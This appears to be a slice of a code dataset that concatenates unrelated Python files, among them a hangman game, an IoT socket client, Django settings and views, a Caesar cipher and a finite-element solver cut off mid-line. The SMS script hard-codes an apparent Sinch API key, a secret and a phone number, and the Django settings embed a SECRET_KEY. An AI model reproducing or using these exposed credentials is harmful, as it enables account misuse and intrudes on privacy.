loop:\n #if q.empty():\n # print(\"q is empty\")\n #else:\n data=q.get()\n if data[0]=='Temp':\n send_data=client_id+command+data[0]+data_len\n sock.send(send_data.encode())\n print(send_data)\n send_data=str(Cutting(data[1],10))\n sock.send(send_data.encode())\n print(send_data)\n elif data[0]=='Humi':\n send_data=client_id+command+data[0]+data_len\n sock.send(send_data.encode())\n send_data=str(Cutting(data[1],10))\n sock.send(send_data.encode())\n elif data[0]=='Ligt':\n send_data=client_id+command+data[0]+data_len\n sock.send(send_data.encode())\n send_data=str(Cutting(data[1],10))\n sock.send(send_data.encode())\n elif data[0]=='Cds ':\n send_data=client_id+command+data[0]+data_len\n sock.send(send_data.encode())\n send_data=str(Cutting(data[1],10))\n sock.send(send_data.encode())\n elif data[0]=='Vr ':\n send_data=client_id+command+data[0]+data_len\n sock.send(send_data.encode())\n send_data=str(Cutting(data[1],10))\n sock.send(send_data.encode())\n print(\"data all printed\")\n \n \ndef echo_client(host,port):\n global sock\n\n server_address = (host, port)\n print(\"[Connecting to %s port %s\" % server_address)\n\n sock.connect(server_address)\n\n print(\"[Connected!]\")\n \ndef Cutting(data,number):\n if len(str(data))>number:\n data=str(data)[0:number]\n\ndef main():\n try:\n #echo_client(server_ip,server_port)\n loop=True\n q=Queue()\n p=Process(target=echo_client,args=(server_ip,server_port))\n p1=Process(target=ProcessSensors, args=(loop,q))\n p3=Process(target=ProcessData,args=(loop,q))\n #p2=Process(target=ProcessPir,args=(loop,q))\n p.start()\n p1.start()\n p3.start()\n #p2.start()\n print(q.qsize())\n \n except KeyboardInterrupt:\n p1.stop()\n p.stop()\n p3.stop()\n #p2.stop()\n \n spi.close()\n sys.exit()\n \nif __name__=='__main__':\n main()\n","sub_path":"드라이브 박제/180524_Day3/project(승용)/poject_1.py","file_name":"poject_1.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"504789778","text":"# Hangman\n# Letters available to guess will be stored in a list. Once entered, they are removed.\"\n# The \"hanging\" man will be represented by a counter up to 5.\n# The word to guess will be randomly selected from a list.\n# The word to guess will initially appear as a series of asterisks.\n# As letters are guessed correctly, asterisks will be replaced with those letters.\"\n# Once the guessed word is complete, the game is won.\n# Once the counter for incorrect words reaches 10, the game is lost.\n\nimport pprint\nimport random\n\n# how many guesses you get\ntargetnum = 5\n\n\n# Generate a \"random\" word\ndef setup():\n words = [\"airplane\", \"batman\", \"canada\", \"dabble\", \"elephant\", \"gravelly\"]\n global theword\n global hiddenlist\n global thewordlist\n global counter\n\n theword = words[random.randint(0, len(words) - 1)]\n # turn the word to be guessed into a list of its individual letters, so that we can run through each letter\n thewordlist = list(theword)\n\n # thewordlist is converted to asterisks the same length as the word\n hiddenlist = []\n for i in thewordlist:\n hiddenlist.append(\"*\")\n\n counter = 0\n\n\n# the main guessing loop.\n# performs different actions based on user input for guessing\ndef guessing():\n setup()\n # the list of letters in the alphabet... don't know if there's a better way to do this\n remainingLetters = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\",\n \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n # this guessedletters list stores the letters that have already been guessed\n guessedLetters = []\n\n print(\"HANGMAN: by Alex T\")\n print(\"---------------------------\")\n print()\n print(\"Here's your word: \" + \"\".join(hiddenlist))\n\n # while loop to make the game end after we run out of guesses\n while counter < targetnum:\n\n # Checks for a win at the beginning of the loop\n if hiddenlist == thewordlist:\n print(\"Congrats! You've won!\")\n replay()\n\n # Prompt statement. Plays every time.\n print(\"You have \" + str(targetnum - counter) + \" guesses left.\")\n print(\"Enter a letter. '?' for available letters, '!' for guessed letters, ':' for the word so far.\")\n playerGuess = input()\n\n # Input \"?\": Show what can still be guessed.\n if playerGuess == \"?\":\n print(\"The remaining letters are:\")\n print(remainingLetters)\n\n # Input \"!\": Show what has been guessed.\n elif playerGuess == \"!\":\n print(\"The guessed letters are:\")\n print(guessedLetters)\n\n elif playerGuess ==\":\":\n print(\"The word so far is:\")\n print(\"\".join(hiddenlist))\n\n # Condition if a guess is \"valid\"\n # \"Valid guess\" meaning it has not yet been guessed, not a \"help\" symbol, nor any non-single letter string\n elif playerGuess in remainingLetters:\n # Take the guessed letter out of the remaining letters, and add it to the guessed letters.\n remainingLetters.remove(playerGuess)\n guessedLetters.append(playerGuess)\n guessedLetters.sort()\n # Pass the guess to evaluate() to see if it's correct.\n evaluate(playerGuess)\n # print(\"The remaining letters are:\")\n # print(remainingLetters)\n\n # Condition if guess is \"invalid\"\n # \"Invalid guess\" meaning it has been guessed already. We don't increment the counter for this.\n elif playerGuess in guessedLetters:\n print(playerGuess + \" has already been guessed. Try again.\")\n print(\"The guessed letters are:\")\n print(guessedLetters)\n\n # Invalid input: not a letter or a help command\n else:\n print(\"Could not proceed. Try again.\")\n\n # Haven't figured out where a win should be defined.\n # Once the counter runs out guessing() will automatically give you the lose condition.\n print(\"You lose! WOMP WOMP.\")\n print()\n replay()\n\n\n\ndef replay():\n # Give user option to play again\n print(\"Play again? Y/N\")\n playagain = input()\n # a list containing possible versions of yes\n y = [\"Y\", \"y\", \"yes\", \"Yes\", \"YES\", \"hella\", \"yessir\", \"yep\", \"FO SHO\"]\n # N = [\"N\",\"n\",\"no\",\"No\",\"NO\",\"nah\",\"nope\"]\n if playagain in y:\n print()\n guessing()\n else:\n exit()\n\n\n# This evaluate function determines whether a guess is right or not, and responds accordingly.\ndef evaluate(letter):\n global counter\n if letter in thewordlist:\n currIndex = 0\n for i in thewordlist:\n if letter == i:\n hiddenlist[currIndex] = letter\n currIndex += 1\n print(\"Good guess. Here is the word:\")\n print(\"\".join(hiddenlist))\n elif letter not in thewordlist:\n print(\"Nope. Wrong guess.\")\n counter += 1\n\n\n\nguessing()","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"340328938","text":"import time\r\nfrom sinchsms import SinchSMS\r\n\r\nnumber = '+447948050817'\r\nmessage = 'shaojie is smart'\r\n\r\nclient = SinchSMS('0a0cb8f3-829b-4613-b34c-f96ed8a94978', 'ATOI/bqb0E2XJaSv1KOQ/Q==')\r\n\r\nprint(\"Sending '%s' to %s\" % (message, number))\r\nresponse = client.send_message(number, message)\r\nmessage_id = response['messageId']\r\n\r\nresponse = client.check_status(message_id)\r\nwhile response['status'] != 'Successful':\r\n print(response['status'])\r\n time.sleep(1)\r\n response = client.check_status(message_id)\r\nprint(response['status'])\r\n","sub_path":"sms.py","file_name":"sms.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"167137834","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = 'hq.l'\n\nimport numpy as np\nimport cv2\n\nlogo = cv2.imread(\"tmp.jpg\")\nim = cv2.imread(\"1.jpg\")\ncv2.imshow('logo', logo)\ncv2.imshow('img', im)\n\nx1 = 10\ny1 = 10\nimg2 = im[10:69, 10:101]\n\nim[10:69, 10:101] = cv2.addWeighted(logo,1,img2,0,0)\n\ncv2.imshow('res', im)\ncv2.waitKey(0)","sub_path":"OpenCV_pro/roi.py","file_name":"roi.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"629928030","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n mStack = []\n while head != None:\n mStack.append(head.val)\n head = head.next\n \n dummyHead = ListNode()\n pointer = dummyHead\n while len(mStack) != 0:\n pointer.next = ListNode(mStack.pop())\n pointer = pointer.next\n \n return dummyHead.next","sub_path":"206. Reverse Linked List/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"642614250","text":"import argparse\nimport json\nimport os\nimport shlex\n\n\ndef parse_json(json_path):\n with open(json_path) as f:\n data = json.load(f)\n return data\n\n\ndef output_bash_commands(json_path):\n for k, v in parse_json(json_path).items():\n value = shlex.quote(str(v))\n export = f\"export {k}={value}\"\n print(export)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"json_path\", type=str)\n args = parser.parse_args()\n output_bash_commands(args.json_path)\n","sub_path":"runtime/load_env.py","file_name":"load_env.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"2144866","text":"\r\n\r\n\r\n #Gamers2303\r\n#New York Rush\r\n#Adriana,Briget,Rosario,Jozka\r\n#\r\nfrom gamelib import*#import game library\r\ngame = Game(800,600,\"New York Rush\")\r\n\r\n#title\r\ntitle = Image(\"title.png\",game)\r\ntitle.y -= 150\r\n\r\n#bk\r\nbk = Image(\"Backup Cover.jpg\",game)#Image Object\r\nbk.resizeTo(800,600)\r\ngame.setBackground(bk)\r\n\r\n#BK- Level 1\r\nbk1 = Image(\"NYC.jpg\",game)\r\nbk1.resizeTo(800,600)\r\n\r\n#bm\r\nbm = Image(\"BM1.gif\",game)\r\nbm.resizeTo(50,40)\r\nbm.moveTo(50,513)\r\nbm.resizeBy(330)\r\n\r\n#tc\r\ntc = []\r\nfor index in range(20):\r\n tc.append(Image(\"tc.png\",game))\r\nfor index in range(20):\r\n x = randint(900,4000) \r\n tc[index].resizeBy(-90)\r\n tc[index].moveTo(x, 550)\r\n tc[index].setSpeed(5,90)\r\n\r\n#You Win\r\nyw = Image(\"YW.png\",game)\r\nyw.moveTo(405,150)\r\n\r\n \r\n \r\n\r\n#elderly\r\nelderly = Image(\"elderly.png\",game)\r\nelderly.resizeTo(30,40)\r\nelderly.moveTo(470,513)\r\nelderly.resizeBy(330)\r\n\r\n#play\r\nplay = Image(\"play.png\",game)\r\nplay.moveTo(550,20)\r\nplay.resizeBy(-40)\r\nplay.y += 200\r\n\r\n#END\r\nend = Image (\"end.jpg\",game)\r\nend.resizeTo(800,600)\r\n\r\n#gameover\r\ngameover = Image (\"gameover.png\",game)\r\ngameover.moveTo(405,150)\r\n\r\n\r\njumping = False #Used to check to see if you are jumping\r\nlanded = False #Used to check to see if you have landed on the \"ground\" (platform)\r\nfactor = 1 #Used for a slowing effect of the jumping\r\n\r\n#Title Screen - first game loop\r\nwhile not game.over:\r\n game.processInput()\r\n\r\n bk.draw()\r\n play.draw()\r\n title.draw()\r\n \r\n\r\n if play.collidedWith(mouse) and mouse.LeftClick:\r\n game.over = True\r\n\r\n game.update(30)\r\n\r\ngame.over = False\r\n#Level 1\r\ntcPassed = 0\r\nwhile not game.over:\r\n game.processInput()\r\n\r\n bk1.draw()\r\n bm.draw()\r\n\r\n #tc\r\n for index in range(20):\r\n tc[index].move()\r\n if tc[index].collidedWith(bm):\r\n bm.health -=1\r\n if tc[index].isOffScreen(\"left\") and tc[index].visible:\r\n tcPassed += 1\r\n tc[index].visible = False\r\n\r\n if tcPassed >= 20:\r\n end.draw()\r\n yw.draw()\r\n game.drawText(\"YOU WIN!\",100,5)\r\n \r\n\r\n if tc[index].isOffScreen(\"left\"):\r\n x = randint(900,4000) \r\n tc[index].moveTo(x, 550)\r\n \r\n \r\n \r\n \r\n\r\n \r\n if bm.health <0: \r\n end.draw()\r\n gameover.draw()\r\n game.drawText(\"YOU LOSE!\",100,5)\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n \r\n\r\n#jumping\r\n if bm.y< 400:\r\n landed = False#not landed\r\n #if bm.collidedWith(platform,\"rectangle\"):\r\n #landed = True\r\n else:\r\n landed = True\r\n\r\n if keys.Pressed[K_SPACE] and landed and not jumping:#if you have landed and are not jumping and press the space bar then jump\r\n jumping = True\r\n\r\n if jumping:\r\n bm.y -=40*factor\r\n #Make the character go up. Factor creates a slowing effect to the jump\r\n factor*=.95#fall slowly\r\n landed = False\r\n #Since you are jumping you are no longer staying on land\r\n if factor < .12:\r\n jumping = False\r\n #Stop jumping once the slowing effect finishes\r\n factor = 1\r\n \r\n if not landed:\r\n bm.y +=17#adjust as needed\r\n#bm keys \r\n if keys.Pressed[K_RIGHT]:\r\n bm.x += 8\r\n if keys.Pressed[K_LEFT]:\r\n bm.x -= 8\r\n\r\n\r\n game.drawText(\"Health: \" + str(bm.health) , bm.x-20, bm.y+50)\r\n\r\n\r\n \r\n game.update(30)\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n game.update(60)\r\ngame.quit()\r\n\r\n","sub_path":"NYC RUSH.py","file_name":"NYC RUSH.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"480465073","text":"\"\"\"\nThe classes in this file are for aiding the building of filtered cypher queries\nin NeoTransformer.\n\"\"\"\n\nfrom enum import Enum\nfrom typing import Union, Tuple\n\nclass QueryLocation(Enum):\n SUBJECT='subject'\n OBJECT='object'\n EDGE='edge'\n NODE='node'\n\n @staticmethod\n def values():\n return [x.value for x in QueryLocation]\n\nclass QueryType(Enum):\n LABEL='label'\n CATEGORY='category'\n PROPERTY='property'\n\n @staticmethod\n def values():\n return [x.value for x in QueryType]\n\n\nclass Query(object):\n \"\"\"\n Represents a cypher Query in :py:class:src.graphical_db\n \"\"\"\n def __init__(self, target:str, value:Union[str, Tuple[str, str]]):\n query_local, query_type = target.split('_')\n self.target = target\n self.query_local = QueryLocation(query_local)\n self.query_type = QueryType(query_type)\n self.value = value\n\n if self.query_type is QueryType.PROPERTY:\n assert isinstance(value, tuple) and len(value) == 2, 'Property filter values must be a tuple of length 2'\n\n def __str__(self):\n \"\"\"\n A human readable string representation of a Filter object\n types:\n subject_category\n object_category\n node_category\n edge_label\n\n subject_property\n object_property\n node_property\n edge_property\n \"\"\"\n return 'Query[target={}, value={}]'.format(self.target, self.value)\n\n @staticmethod\n def build(query_local:QueryLocation, query_type:QueryType, value):\n \"\"\"\n A factory method for building a Filter using the given enums\n\n Only edges should have the target \"edge_label\", and edges should not be\n combined with the \"category\" location.\n \"\"\"\n assert not (query_type is QueryType.LABEL and query_local is not QueryLocation.EDGE)\n assert not (query_local is QueryLocation.EDGE and query_type is QueryType.CATEGORY)\n\n return Query('{}_{}'.format(query_local.value, query_type.value), value)\n\n @staticmethod\n def targets():\n targets = []\n for query_type in QueryType:\n for query_local in QueryLocation:\n try:\n targets.append(\n Query.build(query_type=query_type, query_local=query_local, value=(None, None)).target\n )\n except:\n continue\n return targets\n\nif __name__ == '__main__':\n print(Query('subject_label', 'gene'))\n print(Query.build(QueryLocation.EDGE, QueryType.PROPERTY, ('property_name', 'property_value')))\n print(Query.targets())\n","sub_path":"build/lib/network/model/graph_query.py","file_name":"graph_query.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"136120569","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nimport os\nimport environ\nfrom django.conf import global_settings\nfrom django.contrib import messages\n\nfrom vaas.configuration.loader import YamlConfigLoader\n\n\nenv = environ.Env()\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\nconfig_loader = YamlConfigLoader()\n\nif not config_loader.determine_config_file('db_config.yml'):\n raise EnvironmentError('Cannot find db_config file')\n\nDATABASES = config_loader.get_config_tree('db_config.yml')\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'pwm_&@a%yd8+7mqf9=*l56+y!@sb7ab==g942j7++gnr9l2%*d'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\n# SECURITY WARNING: don't run with debug turned on in production!\nALLOWED_HOSTS = []\n\nMESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'\n\n# Application definition\nINSTALLED_APPS = (\n 'django_nose',\n 'vaas.adminext',\n 'django_admin_bootstrapped',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'tastypie',\n 'simple_history',\n 'vaas.manager',\n 'vaas.cluster',\n 'vaas.monitor',\n 'vaas.account',\n 'vaas.purger',\n 'taggit',\n 'django_ace',\n 'social_django',\n)\n\n# Plugins definition\nINSTALLED_PLUGINS = ()\nMIDDLEWARE_PLUGINS = ()\n\nMIDDLEWARE_CLASSES = (\n 'djangosecure.middleware.SecurityMiddleware',\n 'log_request_id.middleware.RequestIDMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'vaas.manager.middleware.VclRefreshMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'simple_history.middleware.HistoryRequestMiddleware',\n)\n\nSECURE_CONTENT_TYPE_NOSNIFF = True\n\nROOT_URLCONF = 'vaas.urls'\n\nWSGI_APPLICATION = 'vaas.external.wsgi.application'\n\nSIGNALS = 'on'\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Warsaw'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static/\")\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates'), ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.request',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'social_django.context_processors.backends',\n 'social_django.context_processors.login_redirect',\n ],\n },\n },\n]\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': '/tmp/debug.log',\n 'formatter': 'verbose'\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file'],\n 'propagate': False,\n 'level': 'ERROR',\n },\n 'vaas': {\n 'handlers': ['file'],\n 'propagate': False,\n 'level': 'DEBUG',\n },\n '': {\n 'handlers': ['file'],\n 'level': 'INFO',\n }\n }\n}\n\nVAAS_LOADER_PARTIAL_RELOAD = False\nVAAS_LOADER_MAX_WORKERS = 30\n\nREFRESH_TRIGGERS_CLASS = (\n 'Probe', 'Backend', 'Director', 'VarnishServer', 'VclTemplate', 'VclTemplateBlock', 'TimeProfile', 'VclVariable'\n)\n\n# CELERY\nBROKER_URL = env.str('BROKER_URL', default='redis://localhost:6379/1')\nCELERY_RESULT_BACKEND = env.str('CELERY_RESULT_BACKEND', default='redis://localhost:6379/2')\nCELERY_TASK_RESULT_EXPIRES = env.int('CELERY_TASK_RESULT_EXPIRES', default=600)\nCELERY_TASK_SERIALIZER = 'json'\nCELERY_RESULT_SERIALIZER = 'json'\nCELERY_IGNORE_RESULT = env.bool('CELERY_IGNORE_RESULT', False)\nCELERY_TASK_PUBLISH_RETRY = env.bool('CELERY_TASK_PUBLISH_RETRY', True)\n\nVARNISH_COMMAND_TIMEOUT = 5\n\n# UWSGI CONTEXT SWITCH (UGREEN)\nENABLE_UWSGI_SWITCH_CONTEXT = env.bool('ENABLE_UWSGI_SWITCH_CONTEXT', False)\n\nVCL_TEMPLATE_COMMENT_REGEX = env.str('VCL_TEMPLATE_COMMENT_REGEX', default=None)\nVCL_TEMPLATE_COMMENT_VALIDATION_MESSAGE = env.str('VCL_TEMPLATE_COMMENT_VALIDATION_MESSAGE', default=None)\n","sub_path":"vaas-app/src/vaas/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"479577288","text":"# Dependencies\nimport re\n\n# Data\ntext1 = \"crypto-bot that is trading Bitcoin and other currencies\"\ntext2 = \"cryptography encryption methods that can be cracked easily with quentum computers\"\n\n# One-liner\npattern = re.compile(\"crypto(.{1,30})coin\")\n\n# Result\nprint(pattern.match(text1))\nprint(pattern.match(text2))","sub_path":"regex_01.py","file_name":"regex_01.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"166778913","text":"from typing import Optional, Any, List\nimport os\nfrom time import time\nimport pickle\nfrom http.cookiejar import MozillaCookieJar, Cookie\nfrom requests.cookies import RequestsCookieJar\n\nfrom nhltv_lib.common import touch\n\nCOOKIE_FILE = \"auth_cookie\"\n\n\ndef save_cookies_to_txt(cookies: List[Any], filename: str) -> None:\n # Ensure the cookie file exists\n if not os.path.isfile(filename):\n touch(filename)\n\n cjar = MozillaCookieJar(filename)\n for cookie in cookies:\n cjar.set_cookie(cookie)\n cjar.save(ignore_discard=False)\n\n\ndef load_cookie() -> List[Optional[Any]]:\n # Ensure the cookie file exists\n if not os.path.isfile(COOKIE_FILE):\n touch(COOKIE_FILE)\n\n with open(COOKIE_FILE, \"rb\") as f:\n try:\n return pickle.load(f)\n except EOFError:\n return []\n\n\ndef save_cookie(cookies: RequestsCookieJar) -> None:\n # Ensure the cookie file exists\n if not os.path.isfile(COOKIE_FILE):\n touch(COOKIE_FILE)\n\n with open(COOKIE_FILE, \"wb\") as f:\n return pickle.dump(cookies, f)\n\n\ndef create_nhl_cookie(name: str, value: str) -> Cookie:\n return Cookie(\n version=None,\n name=name,\n value=value,\n port=None,\n port_specified=False,\n domain=\".nhl.com\",\n domain_specified=False,\n domain_initial_dot=False,\n path=\"/\",\n path_specified=True,\n secure=False,\n discard=False,\n comment=\"TestCookie\",\n comment_url=None,\n expires=(int(time()) + 7500),\n rest={},\n )\n","sub_path":"nhltv_lib/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"369497345","text":"from django.shortcuts import render,redirect\nfrom user.models import common_member, common_member_action_log, follower_pair, common_member_star\nfrom article.models import forum_post\nfrom django.urls import reverse\nfrom homepage.form import UserInfoChangeForm\nfrom gongchengmiao_BBS import settings\nfrom django.http import HttpResponseRedirect\n# Create your views here.\n\n\ndef show_info(request, username):\n user = common_member.objects.filter(username=username) # 被浏览者\n if len(user) == 0:\n return redirect(reverse('index'))\n user = user[0]\n actions = common_member_action_log.objects.filter(uid=user).order_by('-dateline')[0:5]\n\n if request.method == 'GET' and len(request.GET):\n if 'btn' in list(request.GET) and request.GET['btn'] == 'show_more':\n actions = common_member_action_log.objects.filter(uid=user).order_by('-dateline')[0:10]\n elif 'btn' in list(request.GET) and request.GET['btn'] == 'follow_him'and username != request.user.username:\n common_member.objects.filter(username=username).update(followed=user.followed+1)\n common_member.objects.filter(username=request.user.username).update(following=request.user.following+1)\n follower_pair.objects.create(followed=user, by=request.user)\n user = common_member.objects.filter(username=username) # 被浏览者\n user = user[0]\n elif 'btn' in list(request.GET) and request.GET['btn'] == 'send_msg':\n pass\n elif 'star_btn' in list(request.GET):\n the_post = forum_post.objects.filter(pid=int(request.GET['star_btn']))[0]\n common_member_action_log.objects.create(uid=request.user, pid=the_post, action='star')\n if len(common_member_star.objects.filter(uid=request.user, pid=the_post)) != 0:\n common_member_star.objects.create(uid=request.user, pid=the_post)\n\n context = {\n 'username': user.username,\n 'gender': user.gender,\n 'profile': user.profile,\n 'posts': user.posts,\n 'following': user.following,\n 'followed': user.followed,\n 'portrait': user.portrait,\n 'actions': enumerate(actions)\n }\n\n return render(request, 'personal_page_show_demo.html', context)\n\n\n\ndef view_self_info(request):\n # print('view_self')\n if request.user.is_authenticated == False:\n return redirect(reverse('login'))\n my_actions = common_member_action_log.objects.filter(uid=request.user).order_by('-dateline')[0:10]\n\n my_followings = follower_pair.objects.filter(by=request.user).order_by('-follow_time').all()\n following_id = []\n for following in my_followings:\n following_id.append(following.followed)\n following_actions = common_member_action_log.objects.filter(uid__in=following_id).order_by('-dateline')[0:10]\n following_id = following_id[0:5]\n my_star_posts = common_member_star.objects.filter(uid=request.user).order_by('-star_time')[0:10]\n portrait = str(request.user.portrait)\n context = {\n 'username': request.user.username,\n 'portrait': portrait,\n 'gender': request.user.gender,\n 'profile': request.user.profile,\n 'posts': request.user.posts,\n 'my_actions': enumerate(my_actions),\n 'followings': enumerate(following_id),\n 'following_actions': enumerate(following_actions),\n 'my_star_posts': enumerate(my_star_posts)\n }\n\n return render(request, 'personal_page_demo.html', context)\n\n\ndef edit_info(request):\n if request.user.is_authenticated == False:\n return redirect(reverse('login'))\n\n instance_user = common_member.objects.filter(username=request.user.username).all()[0]\n if request.method == 'GET':\n myform = UserInfoChangeForm(instance=instance_user)\n return render(request, \"edit_person_demo.html\", {\"form\": myform, \"portrait\": request.user.portrait})\n else:\n myform = UserInfoChangeForm(request.POST, request.FILES, instance=instance_user)\n if myform.is_valid():\n # print('valid')\n myform.save()\n # print(myform.errors)\n else:\n # print(myform.errors)\n pass\n return render(request, 'edit_person_demo.html', {\"form\": myform, \"portrait\": request.user.portrait})\n","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280011833","text":"import random\ndef encrypt(text,key):\n res=\"\"\n for i in range(len(text)):\n ch=text[i]\n if(ch.isupper()):\n res+=chr((ord(ch)+key-65)%26+65)\n else:\n res+=chr((ord(ch)+key-97)%26+97)\n return(res)\ndef decrypt(text,key):\n res=\"\"\n for i in range(len(text)):\n ch=text[i]\n if(ch.isupper()):\n res+=chr((ord(ch)-key-65)%26+65)\n else:\n res+=chr((ord(ch)-key-97)%26+97)\n return res \ntext=input()\nkey=input()\nprint(text)\nprint(key)\nprint(encrypt(text,int(key)))\nk=input()\nlist=[i for i in range(11)]\nfor i in range(5):\n s=random.choice(list)\n print(s)\n s1=encrypt(k,s)\n print(s1)\n print(decrypt(s1,s))","sub_path":"ins lab python programs/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"332614754","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.linalg import solve_banded\nimport math\nimport seaborn as sns\nsns.set_style(\"whitegrid\")\n\n\ndef tridiagsolver(K,F):\n ud = np.insert(np.diag(K,1), 0, 0) # upper diagonal\n d = np.diag(K) # main diagonal\n ld = np.insert(np.diag(K,-1), len(F)-1, 0) # lower diagonal\n ab = np.matrix([ud, d, ld]) # simplified matrix\n a = solve_banded((1, 1), ab, F)\n return a\n\ndef psi(j,x, dx):\n if x > (j+1)*dx or x < (j-1)*dx:\n return 0\n elif x < j*dx:\n return (x - (j-1)*dx)/dx\n else:\n return ((j+1)*dx - x)/dx\n\ndef galerkin1d(nx):\n x = np.linspace(0,1,nx)\n dx = 1.0/(nx-1)\n K = np.zeros((nx,nx)) # Stiffness matrix\n for i in range(nx):\n if i == 0:\n K[i,i] = 1\n K[i,i+1] = 0\n elif i == len(K)-1:\n K[i,i] = 1\n K[i,i-1] = 0\n else:\n K[i,i] = 2/dx\n K[i,i-1] = -1/dx\n K[i,i+1] = -1/dx\n \n F = np.zeros(nx) # Load vector\n F [0] = 0\n F[1:-1] = (-1.0/dx)*(2*np.cos(x[1:-1]) - np.cos(x[0:-2]) - np.cos(x[2:]))\n F[-1] = 1\n \n a = tridiagsolver(K,F) # Solve system\n \n nxplot = 200 # Recombine phi from basis functions\n plot_x = np.linspace(0,1,nxplot)\n phi_galerkin = np.zeros(nxplot)\n for i in range(len(plot_x)): \n for j in range(len(a)):\n phi_galerkin[i] += a[j]*psi(j, plot_x[i], dx)\n return phi_galerkin\n\nif __name__ == \"__main__\":\n plot_x = np.linspace(0,1,200) # points for plotting\n phi_galerkin5 = galerkin1d(nx=5)\n phi_galerkin9 = galerkin1d(nx=9)\n phi_analy = -np.cos(plot_x) + np.cos(1)*plot_x + 1\n\n plt.figure(1)\n plt.plot(plot_x, phi_analy, label= \"Analytical\")\n plt.plot(plot_x, phi_galerkin5, label=\"Galerkin FE\")\n plt.title(\"Galerkin FE 5 Nodes\")\n plt.ylabel(\"$\\phi$\")\n plt.xlabel(\"x\")\n plt.legend()\n\n plt.figure(2)\n plt.plot(plot_x, phi_analy, label= \"Analytical\")\n plt.plot(plot_x, phi_galerkin9, label=\"Galerkin FE\")\n plt.title(\"Galerkin FE 9 Nodes\")\n plt.ylabel(\"$\\phi$\")\n plt.xlabel(\"x\")\n plt.legend()\n\n plt.figure(3)\n plt.plot(plot_x, 